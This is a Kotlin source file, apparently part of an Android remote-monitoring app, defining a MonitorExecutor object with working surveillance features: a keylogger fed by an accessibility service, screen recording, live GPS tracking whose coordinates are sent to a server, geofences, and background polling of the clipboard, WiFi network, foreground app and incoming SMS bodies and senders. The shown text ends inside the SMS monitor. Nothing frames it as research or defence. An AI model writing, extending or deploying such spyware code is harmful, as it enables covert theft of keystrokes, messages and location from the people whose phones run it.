     1→     1→package com.abuzahra.manager.executor
     2→     2→
     3→     3→import android.Manifest
     4→     4→import android.content.Context
     5→     5→import android.content.pm.PackageManager
     6→     6→import android.location.Location
     7→     7→import android.location.LocationListener
     8→     8→import android.location.LocationManager
     9→     9→import android.os.Build
    10→    10→import android.os.Bundle
    11→    11→import android.os.Looper
    12→    12→import android.provider.CallLog
    13→    13→import android.provider.Telephony
    14→    14→import android.util.Log
    15→    15→import androidx.core.app.ActivityCompat
    16→    16→import androidx.core.content.edit
    17→    17→import com.abuzahra.manager.App
    18→    18→import com.abuzahra.manager.api.ApiClient
    19→    19→import com.abuzahra.manager.service.MyAccessibilityService
    20→    20→import kotlinx.coroutines.CoroutineScope
    21→    21→import kotlinx.coroutines.Dispatchers
    22→    22→import kotlinx.coroutines.Job
    23→    23→import kotlinx.coroutines.delay
    24→    24→import kotlinx.coroutines.isActive
    25→    25→import kotlinx.coroutines.launch
    26→    26→import org.json.JSONArray
    27→    27→import org.json.JSONObject
    28→    28→import java.io.File
    29→    29→import java.text.SimpleDateFormat
    30→    30→import java.util.Date
    31→    31→import java.util.Locale
    32→    32→import java.util.concurrent.ConcurrentLinkedQueue
    33→    33→
    34→    34→/**
    35→    35→ * MonitorExecutor - Complete Implementation
    36→    36→ * Real monitoring functionality for keylogger, location tracking, clipboard, etc.
    37→    37→ */
    38→    38→object MonitorExecutor {
    39→    39→
    40→    40→    private const val TAG = "MonitorExecutor"
    41→    41→    private const val MAX_KEYLOG_SIZE = 100000
    42→    42→    private const val MAX_LOCATION_HISTORY = 500
    43→    43→    private const val MAX_CLIPBOARD_HISTORY = 100
    44→    44→    private const val MAX_NOTIFICATION_HISTORY = 500
    45→    45→
    46→    46→    // ===== MONITORING STATE =====
    47→    47→    private var keyloggerActive = false
    48→    48→    private var screenRecordingActive = false
    49→    49→    private var locationTrackingActive = false
    50→    50→    private var clipboardMonitorActive = false
    51→    51→    private var wifiMonitorActive = false
    52→    52→    private var appMonitorActive = false
    53→    53→    private var smsMonitorActive = false
    54→    54→    private var callMonitorActive = false
    55→    55→    private var notificationMonitorActive = false
    56→    56→
    57→    57→    // ===== DATA STORAGE =====
    58→    58→    private val keylogBuffer = ConcurrentLinkedQueue<KeylogEntry>()
    59→    59→    private val locationHistory = ConcurrentLinkedQueue<LocationEntry>()
    60→    60→    private val clipboardHistory = ConcurrentLinkedQueue<ClipboardEntry>()
    61→    61→    private val notificationHistory = ConcurrentLinkedQueue<NotificationEntry>()
    62→    62→    private val appUsageLog = ConcurrentLinkedQueue<AppUsageEntry>()
    63→    63→    private val geoFences = mutableListOf<GeoFence>()
    64→    64→    
    65→    65→    // ===== JOBS =====
    66→    66→    private var locationJob: Job? = null
    67→    67→    private var clipboardJob: Job? = null
    68→    68→    private var wifiJob: Job? = null
    69→    69→    private var appMonitorJob: Job? = null
    70→    70→    private var smsMonitorJob: Job? = null
    71→    71→    private var callMonitorJob: Job? = null
    72→    72→    
    73→    73→    // ===== LOCATION LISTENER =====
    74→    74→    private var locationListener: LocationListener? = null
    75→    75→
    76→    76→    // ===== DATA CLASSES =====
    77→    77→    data class KeylogEntry(
    78→    78→        val timestamp: Long,
    79→    79→        val packageName: String,
    80→    80→        val text: String,
    81→    81→        val viewType: String
    82→    82→    )
    83→    83→    
    84→    84→    data class LocationEntry(
    85→    85→        val timestamp: Long,
    86→    86→        val lat: Double,
    87→    87→        val lon: Double,
    88→    88→        val accuracy: Float,
    89→    89→        val speed: Float,
    90→    90→        val altitude: Double,
    91→    91→        val provider: String
    92→    92→    )
    93→    93→    
    94→    94→    data class ClipboardEntry(
    95→    95→        val timestamp: Long,
    96→    96→        val text: String,
    97→    97→        val sourcePackage: String?
    98→    98→    )
    99→    99→    
   100→   100→    data class NotificationEntry(
   101→   101→        val timestamp: Long,
   102→   102→        val packageName: String,
   103→   103→        val title: String?,
   104→   104→        val text: String?,
   105→   105→        val category: String?
   106→   106→    )
   107→   107→    
   108→   108→    data class AppUsageEntry(
   109→   109→        val timestamp: Long,
   110→   110→        val packageName: String,
   111→   111→        val eventType: String,
   112→   112→        val duration: Long
   113→   113→    )
   114→   114→    
   115→   115→    data class GeoFence(
   116→   116→        val id: String,
   117→   117→        val lat: Double,
   118→   118→        val lon: Double,
   119→   119→        val radius: Int,
   120→   120→        val active: Boolean,
   121→   121→        val name: String? = null
   122→   122→    )
   123→   123→
   124→   124→    // ===== KEYLOGGER =====
   125→   125→    fun keyloggerStart(): String {
   126→   126→        keyloggerActive = true
   127→   127→        val accessibility = MyAccessibilityService.getInstance()
   128→   128→        
   129→   129→        return if (accessibility != null) {
   130→   130→            MyAccessibilityService.setKeyloggerEnabled(true)
   131→   131→            "Keylogger started and connected to Accessibility Service"
   132→   132→        } else {
   133→   133→            "Keylogger started but Accessibility Service is not active. Enable it in Settings."
   134→   134→        }
   135→   135→    }
   136→   136→
   137→   137→    fun keyloggerStop(): String {
   138→   138→        keyloggerActive = false
   139→   139→        MyAccessibilityService.setKeyloggerEnabled(false)
   140→   140→        return "Keylogger stopped"
   141→   141→    }
   142→   142→
   143→   143→    fun getKeylogger(): Map<String, Any> {
   144→   144→        val entries = keylogBuffer.toList()
   145→   145→        val text = entries.joinToString("") { it.text }
   146→   146→        
   147→   147→        return mapOf(
   148→   148→            "active" to keyloggerActive,
   149→   149→            "count" to entries.size,
   150→   150→            "character_count" to text.length,
   151→   151→            "data" to text.takeLast(5000).ifBlank { "No data captured yet" },
   152→   152→            "entries" to entries.takeLast(50).map { 
   153→   153→                mapOf(
   154→   154→                    "time" to it.timestamp,
   155→   155→                    "app" to it.packageName,
   156→   156→                    "text" to it.text
   157→   157→                )
   158→   158→            },
   159→   159→            "accessibility_service" to (MyAccessibilityService.getInstance() != null)
   160→   160→        )
   161→   161→    }
   162→   162→    
   163→   163→    fun appendKeylog(packageName: String, text: String, viewType: String = "text") {
   164→   164→        if (keyloggerActive) {
   165→   165→            val entry = KeylogEntry(
   166→   166→                timestamp = System.currentTimeMillis(),
   167→   167→                packageName = packageName,
   168→   168→                text = text,
   169→   169→                viewType = viewType
   170→   170→            )
   171→   171→            keylogBuffer.add(entry)
   172→   172→            
   173→   173→            // Limit buffer size
   174→   174→            while (keylogBuffer.size > MAX_KEYLOG_SIZE) {
   175→   175→                keylogBuffer.poll()
   176→   176→            }
   177→   177→            
   178→   178→            // Save to file
   179→   179→            saveKeylogToFile(entry)
   180→   180→        }
   181→   181→    }
   182→   182→    
   183→   183→    private fun saveKeylogToFile(entry: KeylogEntry) {
   184→   184→        try {
   185→   185→            val file = File(App.instance.cacheDir, "keylog_${getDateString()}.log")
   186→   186→            val line = "${entry.timestamp}|${entry.packageName}|${entry.text}\n"
   187→   187→            file.appendText(line)
   188→   188→        } catch (e: Exception) {
   189→   189→            Log.e(TAG, "Failed to save keylog", e)
   190→   190→        }
   191→   191→    }
   192→   192→    
   193→   193→    fun getKeylogFiles(): List<File> {
   194→   194→        return App.instance.cacheDir.listFiles()
   195→   195→            ?.filter { it.name.startsWith("keylog_") && it.name.endsWith(".log") }
   196→   196→            ?.sortedByDescending { it.lastModified() }
   197→   197→            ?: emptyList()
   198→   198→    }
   199→   199→    
   200→   200→    fun clearKeylog(): String {
   201→   201→        keylogBuffer.clear()
   202→   202→        return "Keylog cleared"
   203→   203→    }
   204→   204→
   205→   205→    // ===== SCREEN RECORD =====
   206→   206→    fun screenRecordStart(context: Context, params: Map<String, Any> = emptyMap()): Map<String, Any> {
   207→   207→        screenRecordingActive = true
   208→   208→        Log.i(TAG, "Screen recording flag set. Screen recording requires MediaProjection permission.")
   209→   209→        // Attempt to delegate to ControlExecutor for actual recording
   210→   210→        return try {
   211→   211→            val result = ControlExecutor.startScreenRecording(context, params)
   212→   212→            mapOf(
   213→   213→                "monitor_flag" to true,
   214→   214→                "message" to "Screen recording started - delegated to ControlExecutor",
   215→   215→                "recording_result" to result
   216→   216→            )
   217→   217→        } catch (e: Exception) {
   218→   218→            Log.w(TAG, "ControlExecutor screen recording failed: ${e.message}")
   219→   219→            mapOf(
   220→   220→                "monitor_flag" to true,
   221→   221→                "message" to "Screen recording monitor activated. Use ControlExecutor.recordScreen() for actual MediaProjection-based recording.",
   222→   222→                "hint" to "Ensure screen capture permission has been granted via ScreenCaptureService.",
   223→   223→                "recording_result" to "delegation_failed"
   224→   224→            )
   225→   225→        }
   226→   226→    }
   227→   227→
   228→   228→    fun screenRecordStop(): String {
   229→   229→        screenRecordingActive = false
   230→   230→        return "Screen recording stopped"
   231→   231→    }
   232→   232→    
   233→   233→    fun isScreenRecordingActive(): Boolean = screenRecordingActive
   234→   234→
   235→   235→    // ===== LOCATION TRACKING =====
   236→   236→    fun locationLiveStart(context: Context, intervalSeconds: Int = 30): String {
   237→   237→        if (locationTrackingActive) {
   238→   238→            return "Location tracking already active"
   239→   239→        }
   240→   240→        
   241→   241→        if (ActivityCompat.checkSelfPermission(context, Manifest.permission.ACCESS_FINE_LOCATION) 
   242→   242→            != PackageManager.PERMISSION_GRANTED &&
   243→   243→            ActivityCompat.checkSelfPermission(context, Manifest.permission.ACCESS_COARSE_LOCATION) 
   244→   244→            != PackageManager.PERMISSION_GRANTED) {
   245→   245→            return "Location permission not granted"
   246→   246→        }
   247→   247→        
   248→   248→        locationTrackingActive = true
   249→   249→        val lm = context.getSystemService(Context.LOCATION_SERVICE) as LocationManager
   250→   250→        
   251→   251→        // Create location listener
   252→   252→        locationListener = object : LocationListener {
   253→   253→            override fun onLocationChanged(location: Location) {
   254→   254→                addLocationToHistory(
   255→   255→                    location.latitude,
   256→   256→                    location.longitude,
   257→   257→                    location.accuracy,
   258→   258→                    location.speed,
   259→   259→                    location.altitude,
   260→   260→                    location.provider ?: "unknown"
   261→   261→                )
   262→   262→                
   263→   263→                // Check geofences
   264→   264→                checkGeofences(location.latitude, location.longitude, context)
   265→   265→                
   266→   266→                // Send to server
   267→   267→                CoroutineScope(Dispatchers.IO).launch {
   268→   268→                    try {
   269→   269→                        ApiClient.sendLocation(
   270→   270→                            context,
   271→   271→                            location.latitude,
   272→   272→                            location.longitude,
   273→   273→                            location.accuracy
   274→   274→                        )
   275→   275→                    } catch (_: Exception) {}
   276→   276→                }
   277→   277→            }
   278→   278→            
   279→   279→            override fun onStatusChanged(provider: String?, status: Int, extras: Bundle?) {}
   280→   280→            override fun onProviderEnabled(provider: String) {}
   281→   281→            override fun onProviderDisabled(provider: String) {}
   282→   282→        }
   283→   283→        
   284→   284→        // Request updates
   285→   285→        try {
   286→   286→            if (lm.isProviderEnabled(LocationManager.GPS_PROVIDER)) {
   287→   287→                lm.requestLocationUpdates(
   288→   288→                    LocationManager.GPS_PROVIDER,
   289→   289→                    (intervalSeconds * 1000).toLong(),
   290→   290→                    10f,
   291→   291→                    locationListener!!,
   292→   292→                    Looper.getMainLooper()
   293→   293→                )
   294→   294→            }
   295→   295→            
   296→   296→            if (lm.isProviderEnabled(LocationManager.NETWORK_PROVIDER)) {
   297→   297→                lm.requestLocationUpdates(
   298→   298→                    LocationManager.NETWORK_PROVIDER,
   299→   299→                    (intervalSeconds * 1000).toLong(),
   300→   300→                    10f,
   301→   301→                    locationListener!!,
   302→   302→                    Looper.getMainLooper()
   303→   303→                )
   304→   304→            }
   305→   305→            
   306→   306→            // Get last known location immediately
   307→   307→            val lastKnown = lm.getLastKnownLocation(LocationManager.GPS_PROVIDER)
   308→   308→                ?: lm.getLastKnownLocation(LocationManager.NETWORK_PROVIDER)
   309→   309→            
   310→   310→            if (lastKnown != null) {
   311→   311→                addLocationToHistory(
   312→   312→                    lastKnown.latitude,
   313→   313→                    lastKnown.longitude,
   314→   314→                    lastKnown.accuracy,
   315→   315→                    lastKnown.speed,
   316→   316→                    lastKnown.altitude,
   317→   317→                    lastKnown.provider ?: "unknown"
   318→   318→                )
   319→   319→            }
   320→   320→            
   321→   321→            return "Live location tracking started (interval: ${intervalSeconds}s)"
   322→   322→        } catch (e: Exception) {
   323→   323→            Log.e(TAG, "Location tracking start error", e)
   324→   324→            locationTrackingActive = false
   325→   325→            return "Error: ${e.message}"
   326→   326→        }
   327→   327→    }
   328→   328→
   329→   329→    fun locationStop(): String {
   330→   330→        locationTrackingActive = false
   331→   331→        locationListener?.let {
   332→   332→            // LocationManager removal would need context
   333→   333→        }
   334→   334→        locationListener = null
   335→   335→        locationJob?.cancel()
   336→   336→        locationJob = null
   337→   337→        return "Location tracking stopped"
   338→   338→    }
   339→   339→
   340→   340→    fun isLocationTrackingActive(): Boolean = locationTrackingActive
   341→   341→
   342→   342→    fun addLocationToHistory(lat: Double, lon: Double, accuracy: Float = 0f, speed: Float = 0f, altitude: Double = 0.0, provider: String = "unknown") {
   343→   343→        val entry = LocationEntry(
   344→   344→            timestamp = System.currentTimeMillis(),
   345→   345→            lat = lat,
   346→   346→            lon = lon,
   347→   347→            accuracy = accuracy,
   348→   348→            speed = speed,
   349→   349→            altitude = altitude,
   350→   350→            provider = provider
   351→   351→        )
   352→   352→        locationHistory.add(entry)
   353→   353→        
   354→   354→        // Limit history
   355→   355→        while (locationHistory.size > MAX_LOCATION_HISTORY) {
   356→   356→            locationHistory.poll()
   357→   357→        }
   358→   358→        
   359→   359→        // Save to file
   360→   360→        saveLocationToFile(entry)
   361→   361→    }
   362→   362→
   363→   363→    fun getLocationHistory(): List<Map<String, Any>> {
   364→   364→        return locationHistory.toList().map { entry ->
   365→   365→            mapOf(
   366→   366→                "timestamp" to entry.timestamp,
   367→   367→                "datetime" to formatTimestamp(entry.timestamp),
   368→   368→                "lat" to entry.lat,
   369→   369→                "lon" to entry.lon,
   370→   370→                "accuracy" to entry.accuracy,
   371→   371→                "speed" to entry.speed,
   372→   372→                "altitude" to entry.altitude,
   373→   373→                "provider" to entry.provider
   374→   374→            )
   375→   375→        }
   376→   376→    }
   377→   377→    
   378→   378→    private fun saveLocationToFile(entry: LocationEntry) {
   379→   379→        try {
   380→   380→            val file = File(App.instance.cacheDir, "locations_${getDateString()}.json")
   381→   381→            val json = JSONObject().apply {
   382→   382→                put("timestamp", entry.timestamp)
   383→   383→                put("lat", entry.lat)
   384→   384→                put("lon", entry.lon)
   385→   385→                put("accuracy", entry.accuracy)
   386→   386→                put("speed", entry.speed)
   387→   387→                put("altitude", entry.altitude)
   388→   388→                put("provider", entry.provider)
   389→   389→            }
   390→   390→            file.appendText(json.toString() + "\n")
   391→   391→        } catch (_: Exception) {}
   392→   392→    }
   393→   393→    
   394→   394→    fun clearLocationHistory(): String {
   395→   395→        locationHistory.clear()
   396→   396→        return "Location history cleared"
   397→   397→    }
   398→   398→
   399→   399→    // ===== GEO FENCING =====
   400→   400→    fun geoAdd(params: Map<String, Any>): String {
   401→   401→        val arg = params["arg"]?.toString() ?: ""
   402→   402→        val parts = arg.split(",")
   403→   403→        
   404→   404→        return if (parts.size >= 2) {
   405→   405→            val lat = parts[0].trim().toDoubleOrNull()
   406→   406→            val lon = parts[1].trim().toDoubleOrNull()
   407→   407→            val radius = parts.getOrNull(2)?.trim()?.toIntOrNull() ?: 500
   408→   408→            val name = parts.getOrNull(3)?.trim()
   409→   409→            
   410→   410→            if (lat != null && lon != null) {
   411→   411→                val fence = GeoFence(
   412→   412→                    id = java.util.UUID.randomUUID().toString(),
   413→   413→                    lat = lat,
   414→   414→                    lon = lon,
   415→   415→                    radius = radius,
   416→   416→                    active = true,
   417→   417→                    name = name
   418→   418→                )
   419→   419→                geoFences.add(fence)
   420→   420→                saveGeofences()
   421→   421→                "Geofence added: ${fence.id} at ($lat, $lon) radius ${radius}m"
   422→   422→            } else {
   423→   423→                "Invalid coordinates"
   424→   424→            }
   425→   425→        } else {
   426→   426→            "Usage: lat,lon,radius,name"
   427→   427→        }
   428→   428→    }
   429→   429→
   430→   430→    fun geoRemove(params: Map<String, Any>): String {
   431→   431→        val index = params["arg"]?.toString()?.toIntOrNull() ?: -1
   432→   432→        
   433→   433→        return if (index >= 0 && index < geoFences.size) {
   434→   434→            val removed = geoFences.removeAt(index)
   435→   435→            saveGeofences()
   436→   436→            "Geofence removed: ${removed.id}"
   437→   437→        } else {
   438→   438→            "Invalid index. Use 0-${geoFences.size - 1}"
   439→   439→        }
   440→   440→    }
   441→   441→
   442→   442→    fun geoList(): List<Map<String, Any>> {
   443→   443→        return geoFences.mapIndexed { index, fence ->
   444→   444→            mapOf(
   445→   445→                "index" to index,
   446→   446→                "id" to fence.id,
   447→   447→                "lat" to fence.lat,
   448→   448→                "lon" to fence.lon,
   449→   449→                "radius" to fence.radius,
   450→   450→                "active" to fence.active,
   451→   451→                "name" to (fence.name ?: "Unnamed")
   452→   452→            )
   453→   453→        }
   454→   454→    }
   455→   455→    
   456→   456→    fun geoToggle(params: Map<String, Any>): String {
   457→   457→        val index = params["arg"]?.toString()?.toIntOrNull() ?: -1
   458→   458→        
   459→   459→        return if (index >= 0 && index < geoFences.size) {
   460→   460→            geoFences[index] = geoFences[index].copy(active = !geoFences[index].active)
   461→   461→            saveGeofences()
   462→   462→            "Geofence ${if (geoFences[index].active) "enabled" else "disabled"}"
   463→   463→        } else {
   464→   464→            "Invalid index"
   465→   465→        }
   466→   466→    }
   467→   467→    
   468→   468→    private fun checkGeofences(lat: Double, lon: Double, context: Context) {
   469→   469→        for (fence in geoFences.filter { it.active }) {
   470→   470→            val distance = calculateDistance(lat, lon, fence.lat, fence.lon)
   471→   471→            
   472→   472→            if (distance <= fence.radius) {
   473→   473→                // Buffer event locally
   474→   474→                com.abuzahra.manager.EventBuffer.addEvent(
   475→   475→                    "geofence_entered",
   476→   476→                    mapOf(
   477→   477→                        "fence_id" to fence.id,
   478→   478→                        "fence_name" to (fence.name ?: "Unnamed"),
   479→   479→                        "distance" to distance
   480→   480→                    )
   481→   481→                )
   482→   482→            }
   483→   483→        }
   484→   484→    }
   485→   485→    
   486→   486→    private fun calculateDistance(lat1: Double, lon1: Double, lat2: Double, lon2: Double): Float {
   487→   487→        val results = FloatArray(1)
   488→   488→        Location.distanceBetween(lat1, lon1, lat2, lon2, results)
   489→   489→        return results[0]
   490→   490→    }
   491→   491→    
   492→   492→    private fun saveGeofences() {
   493→   493→        try {
   494→   494→            val prefs = App.instance.getSharedPreferences("monitor", Context.MODE_PRIVATE)
   495→   495→            val json = JSONArray(geoFences.map { fence ->
   496→   496→                JSONObject().apply {
   497→   497→                    put("id", fence.id)
   498→   498→                    put("lat", fence.lat)
   499→   499→                    put("lon", fence.lon)
   500→   500→                    put("radius", fence.radius)
   501→   501→                    put("active", fence.active)
   502→   502→                    put("name", fence.name)
   503→   503→                }
   504→   504→            })
   505→   505→            prefs.edit().putString("geofences", json.toString()).apply()
   506→   506→        } catch (_: Exception) {}
   507→   507→    }
   508→   508→    
   509→   509→    private fun loadGeofences() {
   510→   510→        try {
   511→   511→            val prefs = App.instance.getSharedPreferences("monitor", Context.MODE_PRIVATE)
   512→   512→            val jsonStr = prefs.getString("geofences", "[]") ?: "[]"
   513→   513→            val json = JSONArray(jsonStr)
   514→   514→            
   515→   515→            geoFences.clear()
   516→   516→            for (i in 0 until json.length()) {
   517→   517→                val obj = json.getJSONObject(i)
   518→   518→                geoFences.add(GeoFence(
   519→   519→                    id = obj.getString("id"),
   520→   520→                    lat = obj.getDouble("lat"),
   521→   521→                    lon = obj.getDouble("lon"),
   522→   522→                    radius = obj.getInt("radius"),
   523→   523→                    active = obj.getBoolean("active"),
   524→   524→                    name = obj.optString("name")
   525→   525→                ))
   526→   526→            }
   527→   527→        } catch (_: Exception) {}
   528→   528→    }
   529→   529→
   530→   530→    // ===== CLIPBOARD MONITOR =====
   531→   531→    fun clipboardMonitorStart(context: Context): String {
   532→   532→        if (clipboardMonitorActive) {
   533→   533→            return "Clipboard monitoring already active"
   534→   534→        }
   535→   535→        
   536→   536→        clipboardMonitorActive = true
   537→   537→        
   538→   538→        clipboardJob = CoroutineScope(Dispatchers.IO).launch {
   539→   539→            var lastClipboard = ""
   540→   540→            
   541→   541→            while (isActive && clipboardMonitorActive) {
   542→   542→                try {
   543→   543→                    val clipboard = context.getSystemService(Context.CLIPBOARD_SERVICE) as android.content.ClipboardManager
   544→   544→                    val clip = clipboard.primaryClip
   545→   545→                    
   546→   546→                    if (clip != null && clip.itemCount > 0) {
   547→   547→                        val text = clip.getItemAt(0).text?.toString() ?: ""
   548→   548→                        
   549→   549→                        if (text.isNotEmpty() && text != lastClipboard) {
   550→   550→                            lastClipboard = text
   551→   551→                            
   552→   552→                            val entry = ClipboardEntry(
   553→   553→                                timestamp = System.currentTimeMillis(),
   554→   554→                                text = text,
   555→   555→                                sourcePackage = clip.description?.label?.toString()
   556→   556→                            )
   557→   557→                            clipboardHistory.add(entry)
   558→   558→                            
   559→   559→                            while (clipboardHistory.size > MAX_CLIPBOARD_HISTORY) {
   560→   560→                                clipboardHistory.poll()
   561→   561→                            }
   562→   562→                            
   563→   563→                            // Buffer event locally
   564→   564→                            com.abuzahra.manager.EventBuffer.addEvent(
   565→   565→                                "clipboard_change",
   566→   566→                                mapOf("text" to text.take(500))
   567→   567→                            )
   568→   568→                        }
   569→   569→                    }
   570→   570→                    
   571→   571→                    delay(2000) // Check every 2 seconds
   572→   572→                } catch (e: Exception) {
   573→   573→                    Log.e(TAG, "Clipboard monitor error", e)
   574→   574→                    delay(5000)
   575→   575→                }
   576→   576→            }
   577→   577→        }
   578→   578→        
   579→   579→        return "Clipboard monitoring started"
   580→   580→    }
   581→   581→
   582→   582→    fun clipboardMonitorStop(): String {
   583→   583→        clipboardMonitorActive = false
   584→   584→        clipboardJob?.cancel()
   585→   585→        clipboardJob = null
   586→   586→        return "Clipboard monitoring stopped"
   587→   587→    }
   588→   588→
   589→   589→    fun isClipboardMonitorActive(): Boolean = clipboardMonitorActive
   590→   590→    
   591→   591→    fun getClipboardHistory(): List<Map<String, Any>> {
   592→   592→        return clipboardHistory.toList().map { entry ->
   593→   593→            mapOf(
   594→   594→                "timestamp" to entry.timestamp,
   595→   595→                "datetime" to formatTimestamp(entry.timestamp),
   596→   596→                "text" to entry.text,
   597→   597→                "source" to (entry.sourcePackage ?: "")
   598→   598→            )
   599→   599→        }
   600→   600→    }
   601→   601→    
   602→   602→    fun clearClipboardHistory(): String {
   603→   603→        clipboardHistory.clear()
   604→   604→        return "Clipboard history cleared"
   605→   605→    }
   606→   606→
   607→   607→    // ===== WIFI MONITOR =====
   608→   608→    fun wifiMonitorStart(context: Context): String {
   609→   609→        if (wifiMonitorActive) {
   610→   610→            return "WiFi monitoring already active"
   611→   611→        }
   612→   612→        
   613→   613→        wifiMonitorActive = true
   614→   614→        
   615→   615→        wifiJob = CoroutineScope(Dispatchers.IO).launch {
   616→   616→            var lastWifi = ""
   617→   617→            
   618→   618→            while (isActive && wifiMonitorActive) {
   619→   619→                try {
   620→   620→                    val wm = context.applicationContext.getSystemService(Context.WIFI_SERVICE) as android.net.wifi.WifiManager
   621→   621→                    
   622→   622→                    if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.Q) {
   623→   623→                        if (ActivityCompat.checkSelfPermission(context, Manifest.permission.ACCESS_FINE_LOCATION) 
   624→   624→                            != PackageManager.PERMISSION_GRANTED) {
   625→   625→                            delay(30000)
   626→   626→                            continue
   627→   627→                        }
   628→   628→                    }
   629→   629→                    
   630→   630→                    val currentWifi = wm.connectionInfo
   631→   631→                    val ssid = currentWifi?.ssid?.toString() ?: "Not connected"
   632→   632→                    
   633→   633→                    if (ssid != lastWifi) {
   634→   634→                        lastWifi = ssid
   635→   635→                        
   636→   636→                        // Buffer event locally
   637→   637→                        com.abuzahra.manager.EventBuffer.addEvent(
   638→   638→                            "wifi_change",
   639→   639→                            mapOf("ssid" to ssid, "bssid" to (currentWifi?.bssid ?: ""))
   640→   640→                        )
   641→   641→                    }
   642→   642→                    
   643→   643→                    delay(30000) // Check every 30 seconds
   644→   644→                } catch (e: Exception) {
   645→   645→                    Log.e(TAG, "WiFi monitor error", e)
   646→   646→                    delay(60000)
   647→   647→                }
   648→   648→            }
   649→   649→        }
   650→   650→        
   651→   651→        return "WiFi monitoring started"
   652→   652→    }
   653→   653→
   654→   654→    fun wifiMonitorStop(): String {
   655→   655→        wifiMonitorActive = false
   656→   656→        wifiJob?.cancel()
   657→   657→        wifiJob = null
   658→   658→        return "WiFi monitoring stopped"
   659→   659→    }
   660→   660→
   661→   661→    fun isWifiMonitorActive(): Boolean = wifiMonitorActive
   662→   662→
   663→   663→    // ===== APP MONITOR =====
   664→   664→    fun appMonitorStart(context: Context): String {
   665→   665→        if (appMonitorActive) {
   666→   666→            return "App monitoring already active"
   667→   667→        }
   668→   668→        
   669→   669→        appMonitorActive = true
   670→   670→        
   671→   671→        appMonitorJob = CoroutineScope(Dispatchers.IO).launch {
   672→   672→            var lastApp = ""
   673→   673→            
   674→   674→            while (isActive && appMonitorActive) {
   675→   675→                try {
   676→   676→                    // Get foreground app using usage stats
   677→   677→                    if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.LOLLIPOP_MR1) {
   678→   678→                        if (ActivityCompat.checkSelfPermission(context, Manifest.permission.PACKAGE_USAGE_STATS) 
   679→   679→                            == PackageManager.PERMISSION_GRANTED) {
   680→   680→                            
   681→   681→                            val usageStatsManager = context.getSystemService(Context.USAGE_STATS_SERVICE) 
   682→   682→                                as android.app.usage.UsageStatsManager
   683→   683→                            
   684→   684→                            val endTime = System.currentTimeMillis()
   685→   685→                            val startTime = endTime - 60000
   686→   686→                            
   687→   687→                            val usageStats = usageStatsManager.queryUsageStats(
   688→   688→                                android.app.usage.UsageStatsManager.INTERVAL_DAILY,
   689→   689→                                startTime, endTime
   690→   690→                            )
   691→   691→                            
   692→   692→                            val foregroundApp = usageStats
   693→   693→                                .filter { it.lastTimeUsed > startTime }
   694→   694→                                .maxByOrNull { it.lastTimeUsed }
   695→   695→                                ?.packageName ?: ""
   696→   696→                            
   697→   697→                            if (foregroundApp.isNotEmpty() && foregroundApp != lastApp) {
   698→   698→                                lastApp = foregroundApp
   699→   699→                                
   700→   700→                                val entry = AppUsageEntry(
   701→   701→                                    timestamp = System.currentTimeMillis(),
   702→   702→                                    packageName = foregroundApp,
   703→   703→                                    eventType = "foreground",
   704→   704→                                    duration = 0
   705→   705→                                )
   706→   706→                                appUsageLog.add(entry)
   707→   707→                                
   708→   708→                                // Buffer event locally
   709→   709→                                com.abuzahra.manager.EventBuffer.addEvent(
   710→   710→                                    "app_change",
   711→   711→                                    mapOf("package" to foregroundApp)
   712→   712→                                )
   713→   713→                            }
   714→   714→                        }
   715→   715→                    }
   716→   716→                    
   717→   717→                    delay(5000) // Check every 5 seconds
   718→   718→                } catch (e: Exception) {
   719→   719→                    Log.e(TAG, "App monitor error", e)
   720→   720→                    delay(10000)
   721→   721→                }
   722→   722→            }
   723→   723→        }
   724→   724→        
   725→   725→        return "App monitoring started"
   726→   726→    }
   727→   727→
   728→   728→    fun appMonitorStop(): String {
   729→   729→        appMonitorActive = false
   730→   730→        appMonitorJob?.cancel()
   731→   731→        appMonitorJob = null
   732→   732→        return "App monitoring stopped"
   733→   733→    }
   734→   734→
   735→   735→    fun isAppMonitorActive(): Boolean = appMonitorActive
   736→   736→    
   737→   737→    fun getAppUsageLog(): List<Map<String, Any>> {
   738→   738→        return appUsageLog.toList().map { entry ->
   739→   739→            mapOf(
   740→   740→                "timestamp" to entry.timestamp,
   741→   741→                "datetime" to formatTimestamp(entry.timestamp),
   742→   742→                "package" to entry.packageName,
   743→   743→                "event" to entry.eventType,
   744→   744→                "duration" to entry.duration
   745→   745→            )
   746→   746→        }
   747→   747→    }
   748→   748→
   749→   749→    // ===== SMS MONITOR =====
   750→   750→    fun smsMonitorStart(context: Context): String {
   751→   751→        if (smsMonitorActive) {
   752→   752→            return "SMS monitoring already active"
   753→   753→        }
   754→   754→        
   755→   755→        smsMonitorActive = true
   756→   756→        
   757→   757→        smsMonitorJob = CoroutineScope(Dispatchers.IO).launch {
   758→   758→            var lastSmsId = 0L
   759→   759→            
   760→   760→            while (isActive && smsMonitorActive) {
   761→   761→                try {
   762→   762→                    if (ActivityCompat.checkSelfPermission(context, Manifest.permission.READ_SMS) 
   763→   763→                        == PackageManager.PERMISSION_GRANTED) {
   764→   764→                        
   765→   765→                        val uri = Telephony.Sms.CONTENT_URI
   766→   766→                        val projection = arrayOf(
   767→   767→                            Telephony.Sms._ID,
   768→   768→                            Telephony.Sms.ADDRESS,
   769→   769→                            Telephony.Sms.BODY,
   770→   770→                            Telephony.Sms.DATE,
   771→   771→                            Telephony.Sms.TYPE
   772→   772→                        )
   773→   773→                        
   774→   774→                        context.contentResolver.query(uri, projection, null, null, "${Telephony.Sms._ID} DESC LIMIT 1")?.use { cursor ->
   775→   775→                            if (cursor.moveToFirst()) {
   776→   776→                                val id = cursor.getLong(0)
   777→   777→                                
   778→   778→                                if (id > lastSmsId) {
   779→   779→                                    lastSmsId = id
   780→   780→                                    
   781→   781→                                    val address = cursor.getString(1)
   782→   782→                                    val body = cursor.getString(2)
   783→   783→                                    val date = cursor.getLong(3)
   784→   784→                                    val type = cursor.getInt(4)
   785→   785→                                    
   786→   786→                                    // Buffer event locally
   787→   787→                                    com.abuzahra.manager.EventBuffer.addEvent(
   788→   788→                                        "sms_received",
   789→   789→                                        mapOf(
   790→   790→                                            "from" to address,
   791→   791→                                            "body" to body,
   792→   792→                                            "type" to (if (type == 1) "received" else "sent")
   793→   793→                                        )
   794→   794→                                    )
   795→   795→                                }
   796→   796→                            }
   797→   797→                        }
   798→   798→                    }
   799→   799→                    
   800→   800→                    delay(10000) // Check every 10 seconds
   801→   801→                } catch (e: Exception) {
   802→   802→                    Log.e(TAG, "SMS monitor error", e)
   803→   803→                    delay(30000)
   804→   804→                }
   805→   805→            }
